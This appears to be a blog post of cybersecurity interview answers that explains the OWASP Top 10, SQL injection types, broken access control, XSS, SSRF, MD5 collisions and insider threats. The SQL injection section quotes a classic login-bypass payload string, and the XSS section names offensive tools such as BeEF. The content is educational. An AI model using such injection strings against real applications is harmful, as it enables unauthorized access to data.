Day-4 Cybersecurity Interview Questions

What is OWASP? Can you explain some web application vulnerabilities?

7 min readFeb 11, 2024

The OWASP (Open Web Application Security Project) Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications. Here are the key points from the 2021 edition:

Broken Access Control: Ensure proper access controls to prevent unauthorized access.
Cryptographic Failures: Focus on cryptography-related issues that can lead to sensitive data exposure or system compromise.
Injection: Guard against injection attacks (e.g., SQL, OS, and NoSQL) that can exploit vulnerabilities.
Insecure Design: Address design flaws early, using threat modeling and secure design principles.
Security Misconfiguration: Configure software securely to prevent common misconfigurations.
Vulnerable and Outdated Components: Be aware of components with known vulnerabilities.
Identification and Authentication Failures: Address issues related to identification failures

Explain the SQL Injection and explain its types?

Whenever I hear SQL Injection,' OR 1 = 1 -- ****I get this in my brain. SQL Injection is an attacker can inject malicious SQL commands into the input fields of the web application, such as a search box or a login form, and trick the database into executing them. This can allow the attacker to access, modify, or delete data from the database, or even take over the web application or the database server.

Error-based SQL injection: The attacker relies on the error messages from the database to get information about its structure and data. For example, the attacker can enter a single quote (‘) in the input field and see if the web application returns an error message that reveals the SQL query that was executed.
Union-based SQL injection: The attacker uses the UNION operator to combine the results of two or more SELECT queries into a single result. For example, the attacker can enter a valid input followed by the UNION operator and another SELECT query that retrieves data from another table.
Boolean-based SQL injection: The attacker sends SQL commands that return a true or false value, and observes the changes in the web application’s response. For example, the attacker can use the AND or OR operators to append a condition to the SQL query and see if the web application returns different content or status codes depending on the condition’s truth value.
Time-based SQL injection: The attacker sends SQL commands that cause a time delay in the database’s response, and measures the time difference in the web application’s response. For example, the attacker can use the SLEEP or WAITFOR functions to make the database wait for a specified number of seconds before returning the result, and see if the web application takes longer to respond as well.

Types of SQL Injection (SQLi) — GeeksforGeeks

https://www.wallarm.com/what/structured-query-language-injection-sqli-part-1

What is Broken Access Control?

Broken access control is a type of vulnerability that allows unauthorized users to gain access to resources or functionalities that they should not have access to. Access control is the process of granting or denying access to different parts of a web application based on the user’s identity, role, or permissions.

if access control is not properly enforced, an attacker may be able to bypass it and exploit the web application. For example, an attacker may be able to:

Access or modify someone else’s account or data by changing the user ID or other parameters in the URL or request body (insecure direct object references or IDOR).
Access restricted pages or functions by guessing or brute-forcing the URL or manipulating the request headers or cookies (forced browsing or horizontal privilege escalation).
Elevate their privileges by exploiting a logic flaw or a misconfiguration in the web application or the database (vertical privilege escalation).
Perform actions on behalf of another user by forging or stealing their session tokens or credentials (session hijacking or CSRF).
Access data or systems that are not intended to be exposed to the internet by exploiting weak or default passwords, directory listings, or backup files (unprotected resources or misconfiguration).

Broken access control can have serious consequences for the web application and its users, such as data breaches, identity theft, fraud, or denial of service.

https://my.f5.com/manage/s/article/K44094284

Explain types of XSS?

An XSS attack is a type of web security vulnerability that allows an attacker to inject malicious code into a website. The code can then run in the browser of a user who visits the website, and access or modify their data, cookies, or session tokens. XSS attacks can also redirect the user to a malicious website, or perform actions on their behalf.

Reflected XSS: The attacker sends a malicious link or email to the victim, who clicks on it and sends a request to the web server. The request contains the attacker’s payload, which is reflected in the response and executed in the victim’s browser12
Stored XSS: The attacker submits a malicious script to the web server, which stores it in a database or other location. The script is then served to the victim as part of the web page content and executed in the victim’s browser12
DOM-based XSS: The attacker manipulates the DOM environment in the victim’s browser, such as the URL or the document object, and injects a malicious script that runs in the context of the web page. The script is never sent to the web server but only executed locally.
https://www.geeksforgeeks.org/what-is-cross-site-scripting-xss/

What type of tools do you use for XSS attacks?

Everyone has their preferences, But I like to use the Beef-XSS framework, Burpsuite, and XSShunter.com. I mostly, use the Beef-XSS framework, It has a nice GUI interface to interact with the victim.

What are cryptographic failures? Can you explain with some examples?

Cryptographic failures are a type of web application vulnerability that occurs when the application does not use cryptography properly to protect sensitive data or communication. This can lead to data exposure, system compromise, or other attacks. Cryptographic failures are ranked as the second most critical risk in the OWASP Top 10:2021 list

Using weak or outdated algorithms or protocols, such as MD5, SHA1, or SSL.
Using default or hard-coded keys, or not managing or rotating keys securely.
Storing passwords in plain text, or using encryption instead of hashing and salting.
Not validating certificates or checking for hostname mismatches.
Not using authenticated encryption or proper padding modes.
Not using secure random number generators or sufficient entropy.
Exposing cryptographic error messages or side-channel information.

A02 Cryptographic Failures — OWASP Top 10:2021

What is MD5 Collision?

An MD5 collision is when two different pieces of data have the same MD5 hash value. The MD5 hash value is a 128-bit number that is supposed to be unique for each data input. However, because there are more possible data inputs than MD5 hash values, some inputs will inevitably share the same hash value. This is called the pigeonhole principle.

Nat McHugh: Create your MD5 collisions

Can you explain Server Side Request Forgery (SSRF)?

SSRF stands for Server-Side Request Forgery, which is a type of web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.

For example, suppose there is a web application that allows users to import data from a URL. The web application takes the user’s input and sends a request to the specified URL, then displays the data on the web page. An attacker can exploit this functionality by supplying a malicious URL that points to an internal or external system that the web application can access, but the attacker cannot. This way, the attacker can access or manipulate information that they are not authorized to.

What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy (portswigger.net)

What is the Mother of All Breach? Why people are talking about it?

The mother of all data breach, or MOAB, is a term used to describe a massive collection of 26 billion records of user information from popular services, such as LinkedIn, Twitter, Adobe, and thousands of other organizations. The data breach was discovered by cybersecurity researchers in January 2024, and it involved 12 terabytes of leaked user data. It is one of the biggest data breaches that ever happened, that’s the reason people were talking about it.

“The mother of all breaches”: 26 billion records found online [Updated] | Malwarebytes

What is insider threat? how do you prevent insider threats?

An insider threat is a security risk that comes from people within an organization, such as employees, former employees, contractors, or business associates, who have inside information or access to the organization’s data, systems, or networks. An insider threat can cause harm to the organization intentionally or unintentionally, by exposing, stealing, modifying, or destroying sensitive or confidential information.

Preventions:

Conduct regular security awareness and training for all staff and contractors, and enforce security policies and procedures.
Implement background checks and screening for new hires and existing employees, and monitor their behavior and performance.
Use technical controls, such as encryption, authentication, authorization, logging, and auditing, to protect data and systems from unauthorized access or misuse.
Use tools or scanners, such as User and Entity Behavior Analytics (UEBA), to detect and respond to any suspicious or anomalous activities or incidents.
Implement the best team for IAM for giving limited access to the employees based on their needs.

What Is an Insider Threat? Definition, Types, and Prevention | Fortinet